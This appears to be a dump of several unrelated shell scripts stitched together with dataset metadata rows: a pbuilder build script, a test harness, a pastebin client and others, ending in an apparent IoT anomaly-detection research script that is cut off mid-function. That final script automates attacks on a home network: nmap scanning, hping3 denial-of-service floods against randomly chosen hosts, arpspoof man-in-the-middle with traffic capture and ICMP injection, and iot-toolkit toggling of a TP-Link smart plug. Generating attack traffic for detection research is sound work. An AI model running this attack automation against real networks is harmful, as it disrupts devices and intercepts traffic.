do_all_preparations() {
if [ ! -f "$BUILD_SRC" ]; then
if [ ! -z "$BUILD_SRC" ]; then
die "Unable to find file: $BUILD_SRC"
else
echo "You must provide path to DSC file"
show_usage
fi
fi
if [ -z "$BUILD_TARGET" ]; then
echo "You must provide build target"
show_usage
fi
if [ -z "$BUILD_REPO_PATH" ]; then
echo "You must provide repository path where to store build results"
show_usage
fi
if [ -z "$BUILD_OUTPUT" ]; then
echo "You must provide repository output path"
show_usage
fi
if [ "$BUILD_TARGET" = "all" ]; then
for i in $SUPPORTED_TARGETS
do
if [ ! -f "/etc/pbuilder/$i" ]; then
die "Unable to find pbuilder config for target: $i"
else
# Check if target not updated for 7 days and update it
if [ `find "/var/cache/pbuilder/base-${i}.tgz" -type f -mtime -7 | wc -l` = 0 ]; then
echo "Target $i not updated last 7 days - updating it"
sudo pbuilder --update --override-config --configfile "/etc/pbuilder/$i" || echo "Failed to update target: $i"
fi
fi
done
else
for i in $BUILD_TARGET
do
if [ ! -f "/etc/pbuilder/$i" ]; then
die "Unable to find pbuilder config for target: $i"
else
# Check if target not updated for 7 days and update it
if [ `find "/var/cache/pbuilder/base-${i}.tgz" -type f -mtime -7 | wc -l` = 0 ]; then
echo "Target $i not updated last 7 days - updating it"
sudo pbuilder --update --override-config --configfile "/etc/pbuilder/$i" || echo "Failed to update target: $i"
fi
fi
done
fi
mkdir -p "$BUILD_OUTPUT"
if [ ! -d "$BUILD_OUTPUT" ]; then
die "Unable to create output directory: $BUILD_OUTPUT"
fi
}
build_single_target() {
local TARGET
TARGET="$1"
find /var/cache/pbuilder/result-$TARGET/ -type f -delete 2>/dev/null || die "Unable to cleanup pbuilder results directory: /var/cache/pbuilder/result-$TARGET"
sudo pbuilder --build --configfile "/etc/pbuilder/$TARGET" "$BUILD_SRC"
if [ $? != 0 ]; then
warn "Failed to build `basename $BUILD_SRC` for target $TARGET"
UNCLEAN_BUILD=1
else
DIST=`echo $i | perl -pi -e 's#-(i386|amd64)$##'`
mkdir -p "$BUILD_OUTPUT/$DIST/$BUILD_REPO_PATH"
if [ ! -d "$BUILD_OUTPUT/$DIST/$BUILD_REPO_PATH" ]; then
die "Unable to create output directory: $BUILD_OUTPUT/$DIST/$BUILD_REPO_PATH"
fi
find /var/cache/pbuilder/result-$TARGET/ -type f ! -name '*.changes' -print0 | xargs -r0 mv -f -t "$BUILD_OUTPUT/$DIST/$BUILD_REPO_PATH"
find /var/cache/pbuilder/result-$TARGET/ -type f -delete 2>/dev/null || die "Unable to cleanup pbuilder results directory: /var/cache/pbuilder/result-$TARGET"
fi
}
build_all_targets() {
for i in $SUPPORTED_TARGETS
do
build_single_target "$i"
done
}
parse_cmdline "$@"
do_all_preparations
if [ "$BUILD_TARGET" = "all" ]; then
build_all_targets
else
for i in $BUILD_TARGET
do
build_single_target "$i"
done
fi
if [ "$UNCLEAN_BUILD" -eq 1 ]; then
warn "One or more targets were not built"
exit 2
fi
| true
|
a71fb4bf3f74008457748c021da7cd1a3a76b489
|
Shell
|
Hazelfire/Haskell-OpenAPI-Client-Code-Generator
|
/.circleci/test_golden
|
UTF-8
| 945
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
actualDir=actual
expectedDir=expected
[[ -d /root/.stack/snapshots/x86_64-linux/d2f1d79601122b1003c68e260f770c1d32d5fe7a028973b8192e738556d0b8b3 ]] && cp -Rn /root/.stack/snapshots/x86_64-linux/d2f1d79601122b1003c68e260f770c1d32d5fe7a028973b8192e738556d0b8b3 /root/.stack/snapshots/x86_64-linux/711b0e993dd52035c0641daec2c20681935ad613e80e3462008d52395107852b || true
GENERATOR_EXE=$(stack path --local-install-root)/bin/openapi3-code-generator-exe
cd .circleci/golden
specification=z_complex_self_made_example.yml
if [[ $1 == "update" ]]; then
echo "Update expected directory"
printf "\n-------------------------\n\n"
$GENERATOR_EXE "../specifications/$specification" --output-dir=$expectedDir --force
else
$GENERATOR_EXE "../specifications/$specification" --output-dir=$actualDir --force
printf "\n-------------------------\n\n"
diff -r $actualDir $expectedDir
fi
printf "\n-------------------------\n\n"
| true
|
038c1bb89eedae71ebfd4c333dc7e587c9deb27c
|
Shell
|
hlecuanda/zconf
|
/local.d/UserPrefs/functions/ixng.zsh
|
UTF-8
| 1,666
| 3.234375
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/usr/bin/env zsh
# _ _
# (_)_ __ (_) ___
# | \ \/ / | |/ _ \
# | |> < _| | (_) |
# |_/_/\_(_)_|\___/
# h@h-lo.me 20190927 144132 -0700 PDT 1569620492 d(-_- )b...
# Zsh implementation of the ix.io pastebin client. Now does more shit
# than the bash version ftw!
#
local opts
local OPTIND
setopt localoptions shwordsplit
[[ -f "$HOME/.netrc" ]] && opts='-n'
(( $+commands[w3m] )) && alias w="$(which w3m)" || alias w='cat -'
while getopts ":hlo:d:i:n:u:" x; do
case $x in
d) curl $opts -X DELETE ix.io/$OPTARG; return;;
i) opts="$opts -X PUT" ; local id="$OPTARG";;
n) opts="$opts -F read:1=$OPTARG";;
o) curl $opts -o -X GET ix.io/$OPTARG; return;;
l) w ix.io/user/ ; return;;
u) w ix.io/user/$OPTARG ; return;;
h|*) cat <<- EOF ; return ;;
usage:
ix hello.txt # paste file (name/ext will be set).
echo Hello world. | ix # read from STDIN (won't set name/ext).
ix -n 1 self_destruct.txt # paste will be deleted after one read.
ix -i ID hello.txt # replace ID, if you have permission.
ix -o ID # print contents of ID as output
ix -d ID # delete ID, if you have permission.
ix -u USER # list pastes for USER
ix -l # list the last 100 pastes
EOF
esac
done
shift $(($OPTIND - 1))
[[ -t 0 ]] && {
local filename="$1"
shift
[[ -n "$filename" ]] && {
curl $opts -F f:1=@"$filename" $* ix.io/$id
return
}
echo "^C to cancel, ^D to send."
}
curl ${(Q)opts} -F f:1='<-' $* ix.io/$id
[[ -o verbose ]] && unsetopt verbose xtrace sourcetrace || :
# vim: set ft=zsh sw=2 tw=0 fdm=manual et :
| true
|
b5d4e773b56c7be914d081bf2865229811678e33
|
Shell
|
arturomunoztolosa-bc/ksz9897_workaround
|
/setup_fixup.sh
|
UTF-8
| 2,076
| 4.15625
| 4
|
[] |
no_license
|
#! /bin/bash
SERVICE_FILE="./workarounds/ksz9897r-rev.A1-fixup.service"
FIXUP_FILE="./workarounds/ksz9897r-rev.A1-fixup.py"
SERVICE_DST_DIR="/etc/systemd/system/"
FIXUP_DST_DIR="/etc/ksz9787_revA1_fixup"
check_or_install_pkg() {
local required_pkg=$1
local pkg_ok=$(dpkg-query -W --showformat='${Status}\n' ${required_pkg} | grep "install ok installed")
echo Checking for ${required_pkg}: $pkg_ok
if [ "" == "$pkg_ok" ]; then
echo "No ${required_pkg}. Installing required dependecy."
apt-get --force-yes --yes install ${required_pkg}
fi
}
check_or_setup_fixup_service() {
local service_path=$1
local fixup_path=$2
local service_dst_dir=$3
local fixup_dst_dir=$4
local service_file=$(basename -- "${service_path}")
local fixup_file=$(basename -- "${fixup_path}")
local status=$(systemctl list-unit-files | grep ${service_file} | awk '{print $2}')
if [ "" == "${status}" ]; then
echo "${service_file} does not exit. Installing service."
# install service unit file
cp ${service_path} ${service_dst_dir}
systemctl enable ${service_file}
# install fixup sciript in known place
mkdir -p ${fixup_dst_dir}
cp ${fixup_path} ${fixup_dst_dir}
chmod +x ${fixup_dst_dir}/${fixup_file}
echo "${service_file} is installed. Reboot is required to apply it."
elif [ "disabled" == "$status" ]; then
echo "${service_file} is disabled. Enable service."
systemctl enable ${service_file}
echo "${service_file} is enabled. Reboot is required to apply it."
else
echo "${service_file} is enabled"
fi
}
if ! [ $(id -u) = 0 ]; then
echo "run script as root"
exit 1
fi
if ! [ -d "workarounds" ]; then
echo "run script from git root directory"
exit 1
fi
# install required dependecy
check_or_install_pkg "i2c-tools"
# setup systemd service to apply workaround of each boot
# and before network service
check_or_setup_fixup_service $SERVICE_FILE $FIXUP_FILE $SERVICE_DST_DIR $FIXUP_DST_DIR
| true
|
a8a3904d16162a7a7c48077468eeba882a250bf4
|
Shell
|
rushioda/PIXELVALID_athena
|
/athena/HLT/HLTTestApps/python/tests/test_lib.sh
|
UTF-8
| 846
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# author Andre Anjos <andre.dos.anjos@cern.ch>
# author Ricardo Abreu <ricardo.abreu@cern.ch>
thisdir="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd -P )"
testdir="$thisdir/../HLTTestApps"
echo $testdir
function runtest()
{
echo
echo "==============================================================="
echo "Running "$@" tests"
echo "==============================================================="
echo
python "$testdir/$@"
ret=$?
echo
echo "============================================"
echo "The status output of this set of tests is $ret"
echo "============================================"
echo
if [ $ret -ne 0 ]; then
exit $ret
fi
}
targets=( "option.py" "pausable_istream.py" "configuration.py" "infrastructure.py" "online_infrastructure.py" "processor.py")
for tgt in "${targets[@]}"
do
runtest $tgt
done
| true
|
04b9b0bb09a63211a5e64bf575b94fa48477e967
|
Shell
|
LigeiramenteDesidratado/config
|
/.local/bin/winspawn
|
UTF-8
| 717
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
# Use -n= to give a name
[ -z "$1" ] && exit
PNAME=$1
POSITIONAL=()
for i in "$@"
do
case $i in
-n=*|--name=*)
PNAME="${i#*=}"
shift
;;
*)
POSITIONAL+=("$1")
shift
;;
esac
done
set -- "${POSITIONAL[@]}"
if xwininfo -tree -root | grep "(\"$1\" ";
then
echo "Window detected."
else
echo "Window not detected... spawning."
swaymsg "exec --no-startup-id $TERMINAL -n $PNAME $(echo "${@:2}") -e $1 " && swaymsg "[instance=\"$PNAME\"] scratchpad show; [instance=\"$PNAME\"] move position center"
sleep .25 # This sleep is my laziness, will fix later (needed for immediate appearance after spawn).
fi
swaymsg "[instance=\"$PNAME\"] scratchpad show; [instance=\"$PNAME\"] move position center"
| true
|
1dc3822eb1e2f62f7042c545c49d7e047fc981b5
|
Shell
|
forkkit/br
|
/tests/br_rawkv/run.sh
|
UTF-8
| 1,792
| 2.703125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
#
# Copyright 2019 PingCAP, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# See the License for the specific language governing permissions and
# limitations under the License.
set -eu
BACKUP_DIR="raw_backup"
# generate raw kv randomly in range[start-key, end-key) in 10s
bin/rawkv --pd $PD_ADDR --mode rand-gen --start-key 31 --end-key 3130303030303030 --duration 10
# output checksum
bin/rawkv --pd $PD_ADDR --mode checksum --start-key 31 --end-key 3130303030303030 > /$TEST_DIR/checksum.out
checksum_ori=$(cat /$TEST_DIR/checksum.out | grep result | awk '{print $3}')
# backup rawkv
echo "backup start..."
run_br --pd $PD_ADDR backup raw -s "local://$TEST_DIR/$BACKUP_DIR" --start 31 --end 3130303030303030 --format hex --concurrency 4
# delete data in range[start-key, end-key)
bin/rawkv --pd $PD_ADDR --mode delete --start-key 31 --end-key 3130303030303030
# TODO: Finish check after restore ready
# restore rawkv
# echo "restore start..."
# run_br --pd $PD_ADDR restore raw -s "local://$TEST_DIR/$BACKUP_DIR" --start 31 --end 3130303030303030 --format hex --concurrency 4
# output checksum after restore
# bin/rawkv --pd $PD_ADDR --mode checksum --start-key 31 --end-key 3130303030303030 > /$TEST_DIR/checksum.out
checksum_new=$(cat /$TEST_DIR/checksum.out | grep result | awk '{print $3}')
if [ "$checksum_ori" == "$checksum_new" ];then
echo "TEST: [$TEST_NAME] successed!"
else
echo "TEST: [$TEST_NAME] failed!"
exit 1
fi
| true
|
4431d169dd28ca63b5820255bcfbbcd67fc4aac0
|
Shell
|
slowinskami/project-IoT_anomaly_detection
|
/ATTACKS/attack_scripts/automate_scenarios.sh
|
UTF-8
| 27,039
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
me=$$
i=0
: 'Scenario 1 : network scanning
This scenario represents the pure reconnaisance attack in which the attacker wants to simply acquire information about the hosts on the network.
In this scenario, we assume that the attacker is already connected to the targeted network and that the attacker knows the subnet that he wants to scan.
The attacker will usually commence his reconnaisance with a quick scan. This is done to just quickly scan the network, identifying which hosts are present on the network and acquiring information on potential hints on where to search for further vulnerabilities / plan further scan / plan next attack actions or simply acquire general information without leaving much footprint on the network to potentially resume his actions later.
After performing a quick scan, the attacker might also want to perform a long, in-depth scan of the network to identify further vulnerabilities (that might have not beed found in the initial quick scan. Likewise, the attacker might want to target specific hosts rather than targeting the whole range on the subnet. The latter is not included in automation but might be configured manually in the script if needed by altering the list of long scans defined in the main loop.
This script performs the quick scan by choosing one random scan from the list of quick scans (arrQUICK) defined in the main loop. Then it proceeds to the long scan with probability 0.5. If peoceeding to random scan, the next scan is chosen randomly from the list of long scans (arrLONG) defined in the main loop.
This attack scenario:
- picks a random quick scan from the list specified in the main loop (arrQUICK)
- performs the quick scan, saves xml results of the scan in the ./scenarios_output/nmap_results_xmls directory
- terminates or proceeds to the long scan with probability 0.5
- picks a random long scan from the list specified in the main loop (arrLONG)
- performs the long scan, saves xml results of the scan in the ./scenarios_output/nmap_results_xmls directory
- saves terminal output to scenarios_output/scenarios_terminal_output.txt
- saves summaries/logs attack details in scenarios_output/scenarios_log.txt'
function scenario1 {
i=$1
start_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf " \nIteration:$1 Scenario:1 = Scanning\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#pick random quick scan from the quick scans list defined in arrQUICK in the main loop
RANDOM=$$$(date +%s)
Random_QUICK=${arrQUICK[$RANDOM % ${#arrQUICK[@]} ]}
#perform quick scan
start_quick=$(date "+%Y.%m.%d-%H.%M.%S")
printf " A) Nmap quick scan\n *$start_quick : $Random_QUICK\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo $(eval $Random_QUICK)
stop_quick=$(date "+%Y.%m.%d-%H.%M.%S")
#pick random long scan (regular or intense) from the long scans list defined in arrLONG in the main loop
RANDOM=$$$(date +%s)
Random_LONG=${arrLONG[$RANDOM % ${#arrLONG[@]} ]}
#decide if doing further scans
rand=$(shuf -i1-2 -n1) #0.5 probability
if [ "$rand" = "1" ]; then
#peforming a long scan
rand=$(shuf -i1-120 -n1) #wait random time (1 sec to 2 mins before launching the next scan - time for scan analysis)
printf "/nrandom is : $rand/n"
start_long=$(date "+%Y.%m.%d-%H.%M.%S")
printf " B) Nmap long scan\n *$start_long : $Random_LONG" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo $(eval $Random_LONG)
stop_long=$(date "+%Y.%m.%d-%H.%M.%S")
else
#not performing a long scan
Random_LONG="not applicable"
start_long="not applicable"
stop_long="not applicable"
fi
stop_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
#print summary for scanning attack with: id, scenatio, start, stop, random quick - type, start, stop, random long - type, start, stop
printf "\n\n$1) Scenario 1 \n *start: $start_current_time \n *stop: $stop_current_time \n *executed: \n **$Random_QUICK \n ***start: $start_quick\n ***stop: $stop_quick\n **$Random_LONG \n ***start: $start_long\n ***stop: $stop_long\n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
}
: 'Scenario 2 : Network scanning + denial(s) of service
This scenario represents a quick reconnaissance followed by one (or more) of the most popular denial of service attacks. The attacker in this scenario performs a quick scanning (with one of the most popular nmap scans) to acquire information about the hosts present on the network as well as to discover information on open ports or other vulnerabilities.
After performing a quick scan, the attacker applies one of the most popular/standard DoS floods on one of the target devices. The attacker might try one or more floods on the same device, one flood on all devices or a mix of floods on a mix of devices.
This script performs the quick scan by choosing one random scan from the list of quick scans (arrQUICK) defined in the main loop. After that, a random number of denial of service attempts is picked. In this case the rationale is that there are six devices on the network so the random number of iterations is between 1 and 6 (inclusive) but this could be altered to cater for specific needs/more devices. In each iteration of the DoS loop, a script will wait for a random amount of time from 1 second to 2 minutes (as the attacker might not execute the scanning and DoS one after another (especially if performing these manually, not in the the script). After that, random DoS attack is chosen fromt he list of most popular DoS attacks defined in the main script execution loop (arrDOS). A random IP is chosen from the IPs list defined at the beginning of script execution. This IP will be the target of the DoS attack.
This attack scenario:
- picks a random quick scan from the list specified in the main loop (arrQUICK)
- performs the quick scan, saves xml results of the scan in the ./scenarios_output/nmap_results_xmls directory
- chooses random amount of repetitions of the DoS attack (from 1 to 6)
- in each iteration of the loop:
- sleeps random amount of time (from 1 second to 2 minutes)
- picks a random DoS attack from the list specified in the main loop (arrDOS)
- performs the DoS attack as a background process
- randomly picks the duration of the DoS (from 30 seconds to 5 minutes)
- kills the background process with the DoS after the previously selected random duration time
- saves terminal output to scenarios_output/scenarios_terminal_output.txt
- saves summaries/logs attack details in scenarios_output/scenarios_log.txt
mental notes:
- go through the xml results and see what ports are open on each device - to justify the list of dos attacks chosen, the ones currently specified might seem a bit random, would be much better if I could adjust them to the identified vulnerabilities.
- shall I run the dos as nohup instead? verify - test thoroughly'
function scenario2 {
i=$1
start_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf " \nIteration:$1 Scenario:2 = DoS\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#pick random quick scan from the quick scans list defined in arrQUICK in the main loop
RANDOM=$$$(date +%s)
Random_QUICK=${arrQUICK[$RANDOM % ${#arrQUICK[@]} ]}
#perform quick scan
start_quick=$(date "+%Y.%m.%d-%H.%M.%S")
printf "\n A) Nmap quick scan\n *$start_quick : $Random_QUICK\n\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo $(eval $Random_QUICK)
stop_quick=$(date "+%Y.%m.%d-%H.%M.%S")
#pick n repetitions of the Denial of Service (repetitions of DoS in general, not repetitions of one specific flood, flood chosen randomly)
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 6 DELETE
rand_repetitions=$(shuf -i1-6 -n1) #1 to 6 as currently 6 devices - the attacker might want to try to flood all of them or less
performedDOS=()
printf "\n\n DOS will be executed $rand_repetitions times...\n\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#execute the repeated denial of service
for (( c=1; c<=$rand_repetitions; c++ ))
do
#sleep for random amount of time
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 120 DELETE
rand_sleep=$(shuf -i1-120 -n1) #choose 1 second to 2 minutes
printf "Sleeping for $rand_sleep seconds..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
sleep $rand_sleep
#pick random DoS attack from the arrDOS list defined in the main loop
RANDOM=$$$(date +%s)
Random_DOS=${arrDOS[$RANDOM % ${#arrDOS[@]} ]}
#pick random IP from the arrIPS identified at the beginning of the script execution
RANDOM=$$$(date +%s)
Random_IP=${arrIPS[$RANDOM % ${#arrIPS[@]} ]}
#TBP!!
#perform the DoS attack for random time - not logged in the main log for now, need to create an empty array and add them plus log times, maybe a tuple/dictionary?
start_DOS=$(date "+%Y.%m.%d-%H.%M.%S")
#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 300 DELETE
rand_duration=$(shuf -i30-300 -n1) #execute dos for random time from 30 seconds to 5 minutes
printf "\n B$c) DOS\n *$start_quick : $Random_DOS$Random_IP for $rand_duration seconds\n\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $Random_DOS$Random_IP) & scriptDOS=$! #run DoS as a background process
sleep $rand_duration
kill $scriptDOS
killall hping3 #to ensure that it was killed
stop_DOS=$(date "+%Y.%m.%d-%H.%M.%S")
performed_DOS+=("start: $start_DOS - stop: $stop_DOS - attack: $Random_DOS$Random_IP duration: $rand_duration seconds")
done
stop_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
#TBP!! - array to print all DoS'es performed along with the time for each DoS, the random time waited before each DoS etc - more complicated array (save all three as one item)
#print summary - change for DoS
printf "\n\n$1) Scenario 2 \n *start: $start_current_time \n *stop: $stop_current_time \n *A)Nmap scanning: \n **$Random_QUICK \n ***start: $start_quick\n ***stop: $stop_quick\n *B)DoS: \n **iterations: $rand_repetitions\n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf ' ***%s\n' "${performed_DOS[@]}" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
}
: 'Scenario 3 : Network scanning + Man in the middle
This scenaro represents a quick reconnaissance followed by a Man-In-The-Middle attack performed via ARP spoofing. The attacker in this scenario performs a quick scanning (with one of the most popular nmap scans) to acquire information about the hosts present on the network as well as to discover information on open ports or other vulnerabilities.
After performing a quick scan, the attacker performs one of the two variants of the arpspoof man-in-the-middle attacks: passive monitoring or packet injection. In passive monitoring, the attacker is simply sniffing on the network traffic between the router and the random target device. Packet injection variant involves an active attacker in which he is injecting ICMP packets. One of these two variants is chosen at random, each with 1/2 probability.
Potentially, other packets could be injected as well. For the time being, these are only ICMP packets. Packet injection is performed in send_ICMP.py script which uses scapy to craft and inject packets.
This attack scenario:
- picks a random quick scan from the list specified in the main loop (arrQUICK)
- performs the quick scan, saves xml results of the scan in the ./scenarios_output/nmap_results_xmls directory
- waits random amount of time before embarking on the MITM attack (from 1 second to 2 minutes)
- picks random IP address to be the target of the attack (from the list of valid IP addresses defined in the main loop)
- randomly chooses one of the variants - passive monitoring or packet injection (1/2 probability each)
- sets up IP forwarding to enable MITM (to accept packets that are not destined at the attacker device)
- performs arpspoof on the victim and the router (tells victim that he is a router and tells router that he is a victim)
- depending on the variant chosen:
- for passive monitoring, starts tcpdump in the middle of the communication
- for packet injection:
- starts tcpdump in the middle of communication
- waits random time before injection of any packet from 10 seconds to 2 minutes
- picks random amount of packets to inject
- after each injection it sleeps for random duration from 1 second to 1 minute
- waits random time after injection of all packets is finished from 10 seconds to 2 minutes
- kills all arpspoof/tcpdump processes running
- disables IP forwarding
- saves terminal output to scenarios_output/scenarios_terminal_output.txt
- saves summaries/logs attack details in scenarios_output/scenarios_log.txt'
function scenario3 {
i=$1
router="192.168.200.1"
Arpspoof="nohup arpspoof -i wlan0 -t " #nohup to run it in the background
sep=" "
noout=" &>/dev/null &"
Inject_packet="python send_ICMP.py "
start_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf " \nIteration:$1 Scenario:3 = MITM\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#pick random quick scan from the quick scans list defined in arrQUICK in the main loop
RANDOM=$$$(date +%s)
Random_QUICK=${arrQUICK[$RANDOM % ${#arrQUICK[@]} ]}
#perform quick scan
start_quick=$(date "+%Y.%m.%d-%H.%M.%S")
printf "\n A) Nmap quick scan\n *$start_quick : $Random_QUICK\n\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo $(eval $Random_QUICK)
stop_quick=$(date "+%Y.%m.%d-%H.%M.%S")
#random wait time
rand_sleep=$(shuf -i1-120 -n1) #choose 1 second to 2 minutes
printf "Sleeping for $rand_sleep seconds ... " 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
sleep $rand_sleep
#pick random IP from the arrIPS identified at the beginning of the script execution
RANDOM=$$$(date +%s)
arrIPS=($2)
printf "\nChecking on arrIPS ...\n"
printf ' *%s\n' "${arrIPS[@]}" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
Random_IP=${arrIPS[$RANDOM % ${#arrIPS[@]} ]}
#probability passive monitoring vs packet injection
rand_probability=$(shuf -i1-2 -n1) #choose 1 of he two attacks with probability 1/2 of passive monitoring and 1/2 of packet injection
start_MITM=$(date "+%Y.%m.%d-%H.%M.%S")
rand_duration=$(shuf -i30-300 -n1) #execute dos for random time from 30 seconds to 5 minutes??????????????????????????????????????????????? is it used ?????????????????
#set up IP forwarding
printf "\nSetting IP forwarding..."
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
#Arpspoof the victim (target's IP)
printf "\nExecuting : $Arpspoof$Random_IP$sep$router$noout\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $Arpspoof$Random_IP$sep$router$noout)
#Arpspoof the router (router's IP)
printf "\nExecuting : $Arpspoof$router$sep$Random_IP$noout\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $Arpspoof$router$sep$Random_IP$noout)
#perform the steps from each depending on probability chosen (if else)
if [ "$rand_probability" = "1" ]; then #passive monitoring
#steps from passive monitoring
MITM_type="passive monitoring"
printf "\nExecuting : TCPDUMP $i - $Random_IP\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
Tcpdump="tcpdump -i wlan0 -s 65535 -w ./scenarios_output/arpspoof_tcpdump/tcpdump-passive$i-$Random_IP.pcap"
printf $(eval $Tcpdump) & scriptTCPDUMP=$!
Random_Num_Packets="not applicable"
#add random exexution time
else
#steps from packet injection
MITM_type="packet injection"
printf "\nExecuting : TCPDUMP $i - $Random_IP\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
Tcpdump="tcpdump -i wlan0 -s 65535 -w ./scenarios_output/arpspoof_tcpdump/tcpdump-injection$i-$Random_IP.pcap"
printf $(eval $Tcpdump) & scriptTCPDUMP=$!
Random_Time_BeforeInj=$(shuf -i10-120 -n1) #from 10 sec to 30 sec
printf "\nAttack duration before injection: $Random_Time_BeforeInj\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
sleep $Random_Time_BeforeInj #change to Random_Time
#injection - random number of ICMP packets with random breaks in between each of them
Random_Num_Packets=$(shuf -i1-50 -n1) #1 to 50
for (( c=1; c<=$Random_Num_Packets; c++ ))
do
injection_time=$(date "+%Y.%m.%d-%H.%M.%S")
#if more packets to be injected - could add an if-else with random choice of the packet to be injected
printf "\n *$injection_time Injecting ICMP packet $c out of $Random_Num_Packets ..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $Inject_packet$Random_IP) & scriptInject=$!
sleep 1
kill $scriptInject
Random_InBetween_Sleep=$(shuf -i1-60 -n1) #from 1 sec to 60 sec
printf "\n Sleeping for $Random_InBetween_Sleep ..."
sleep $Random_InBetween_Sleep
done
Random_Time_AfterInj=$(shuf -i10-120 -n1) #from 10 sec to 5 min
printf "\n Attack duration after injection: $Random_Time_AfterInj\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
sleep $Random_Time_AfterInj
fi
printf "\nFinishing the attack...\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf "\nKilling all arpspoof...\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
killall arpspoof 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf "\nKilling $scriptTCPDUMP...\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
kill $scriptTCPDUMP 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf "\nKilling all tcpdump - to reassure...\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
killall tcpdump 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#disable IP forwarding
printf "\nDisabling IP forwarding..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
#logging
stop_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf "\n\n$1) Scenario 3 Network Scanning + MITM\n *start: $start_current_time \n *stop: $stop_current_time \n *A)Nmap scanning: \n **$Random_QUICK \n ***start: $start_quick\n ***stop: $stop_quick\n *B)MITM: \n **type: $MITM_type \n **number of packets injected: $Random_Num_Packets" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
}
: 'Scenario 4 : Attack on the TP-Link plug with iot-toolkit
This scenaro represents the IoT-specific attack which uses the iot-toolkit framework by Fernando Gont. It targets the TP-Link devices for reconnaissance and performs toggle/get_info on the TP-Link smart plug.
'
function scenario4 {
i=$1
start_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf " \nIteration:$1 Scenario:4 = iot-toolkit\n" 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
#three types of attacks in the framework
iot_scanning="./iot-scan -i wlan0 -L 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt"
iot_get_info="./iot-tl-plug -L -i wlan0 -c get_info 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt"
iot_toggle="./iot-tl-plug --toggle 192.168.200.146" #type in the ip of the plug manually
#parameters for toggle attack
rand_intensity=$(shuf -i50-500 -n1)
rand_time=$(shuf -i30-360 -n1)
hash_sign="#"
toggle_command=$x3$hash_sign$rand_intensity$hash_sign$rand_time
#choose random variant
rand_variant=$(shuf -i1-4 -n1)
if [ "$rand_variant" = "1" ]; then #scanning only
current_time=$(date "+%Y.%m.%d-%H.%M.%S")
printf "$current_time Performing scanning with iot-toolkit..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $iot_scanning)
x_current="Scanning only"
elif [ "$rand_variant" = "2" ]; then #scanning + get_info
printf "$current_time Performing scanning and get_info with iot-toolkit..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $iot_scanning)
printf $(eval $iot_get_info)
x_current="Scanning + get_info"
elif [ "$rand_variant" = "3" ]; then #scanning + toggle
printf "$current_time Performing scanning and toggle(intensity:$rand_intensity, time:$rand_time) with iot-toolkit..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $iot_scanning)
printf $(eval $toggle_command)
x_current="Scanning + toggle"
elif [ "$rand_variant" = "4" ]; then #scanning + get_info + toggle
